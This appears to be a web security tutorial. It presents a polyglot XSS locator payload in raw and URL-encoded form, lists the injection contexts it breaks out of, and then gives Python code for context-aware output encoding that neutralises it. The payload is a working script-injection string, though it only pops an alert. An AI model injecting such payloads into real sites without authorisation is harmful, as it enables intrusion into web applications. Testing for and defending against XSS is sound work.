toString()+alert(/xss/)+function(){/*'+alert(/xss/)+'"+alert(/xss/)+"--></style><img src=x onerror=alert(/xss/)>*/}
URL Encoded:
toString()%2Balert(%2Fxss%2F)%2Bfunction()%7B%2F*%27%2Balert(%2Fxss%2F)%2B%27%22%2Balert(%2Fxss%2F)%2B%22--%3E%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%2Fxss%2F)%3E*%2F%7D
Pros:
- Fires in most injection contexts (listed below)
- Tries not to break the surrounding JavaScript syntax, so the rest of the script still runs
- Easy to identify the vulnerable field (e.g. alert(/userMiddleName/))
Cons:
- Too long for values that have a length limit
List of exploitable places:
- JavaScript/DOM XSS:
  - var x="asdf<%= xssLocator %>xxx";
  - var y='asdf<%= xssLocator %>xxx';
  - opener.<%= xssLocator %>(some, arguments);
  - element.html(xssLocatorInput.value);
- CSS XSS:
  - <style>a:after { content: '<%= xssLocator %>';}</style>
- HTML Attribute XSS:
  - <a href="#" alt="<%= xssLocator %>">test</a>
  - <a href='#' alt='<%= xssLocator %>'>test</a>
- HTML Body and Comments XSS:
  - <%= xssLocator %>
  - <!-- <%= xssLocator %> -->
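The reason one string can break out of all of these contexts is that each context has its own set of terminator characters (quotes for JS and CSS strings, angle brackets for HTML, `*/` and `-->` for comments), and the locator carries all of them. The defensive counterpart is context-aware output encoding: escape according to where the value lands, not with one generic filter. The Python below is an added example (not code from the original page) that encodes the locator for the HTML body, attribute, JS string and CSS string contexts listed above and then checks that none of the terminator tokens survive; the context names, token lists and function names are assumptions made for this illustration.

```python
"""Context-aware output encoding, checked against the XSS locator string."""
import codecs
import html
import re

# The locator from the page, embedded here as a constructed test input.
XSS_LOCATOR = (
    "toString()+alert(/xss/)+function(){/*'+alert(/xss/)+'\"+alert(/xss/)+\""
    "--></style><img src=x onerror=alert(/xss/)>*/}"
)


def encode_html(value: str) -> str:
    """HTML text nodes and quoted attribute values: entity-encode & < > \" '."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Inside a quoted JS string literal: hex-escape everything except a small
    safe set, so quotes, '/', '<', '-' and '*' cannot close the literal, end the
    <script> block, or open a comment."""
    out = []
    for ch in value:
        if re.fullmatch(r"[A-Za-z0-9 ,._]", ch):
            out.append(ch)
        elif ord(ch) < 256:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(f"\\u{ord(ch):04x}")
    return "".join(out)


def decode_js_string(value: str) -> str:
    """Reverse of encode_js_string (valid for ASCII input); used to show the
    encoding is lossless, not a filter that drops characters."""
    return codecs.decode(value, "unicode_escape")


def encode_css_string(value: str) -> str:
    """Inside a quoted CSS string: backslash-hex escape every non-alphanumeric
    character using the fixed six-digit form, which needs no trailing space."""
    return "".join(
        ch if re.fullmatch(r"[A-Za-z0-9]", ch) else f"\\{ord(ch):06x}"
        for ch in value
    )


# Tokens that end the enclosing construct in each context (assumed minimal set).
BREAKOUT_TOKENS = {
    "html_body": ["<", ">"],
    "html_attr_dq": ['"', "<"],
    "html_attr_sq": ["'", "<"],
    "js_string_dq": ['"', "'", "</", "/*", "<!--", "-->", "\n"],
    "css_string": ["'", '"', "</"],
}

ENCODERS = {
    "html_body": encode_html,
    "html_attr_dq": encode_html,
    "html_attr_sq": encode_html,
    "js_string_dq": encode_js_string,
    "css_string": encode_css_string,
}


def breakout_tokens(context: str, value: str, encode: bool = True) -> list:
    """Return the terminator tokens still present in the value once it has been
    encoded for the given context (or raw, when encode=False)."""
    text = ENCODERS[context](value) if encode else value
    return [tok for tok in BREAKOUT_TOKENS[context] if tok in text]


def render_js_var(name: str, value: str) -> str:
    """Emit the 'var x="..."' form from the page with the value safely encoded."""
    return f'var {name}="{encode_js_string(value)}";'


if __name__ == "__main__":
    for ctx in BREAKOUT_TOKENS:
        print(f"{ctx:14} raw: {breakout_tokens(ctx, XSS_LOCATOR, encode=False)}"
              f"  encoded: {breakout_tokens(ctx, XSS_LOCATOR)}")
    print(render_js_var("x", XSS_LOCATOR))
```

Run as a script it prints, per context, which terminator tokens the raw locator carries and that the encoded form carries none. The `decode_js_string` round trip is there to make the design point explicit: the safe output is an escaping, not a blacklist, so no input is rejected or mangled, it is simply rendered as data in every context.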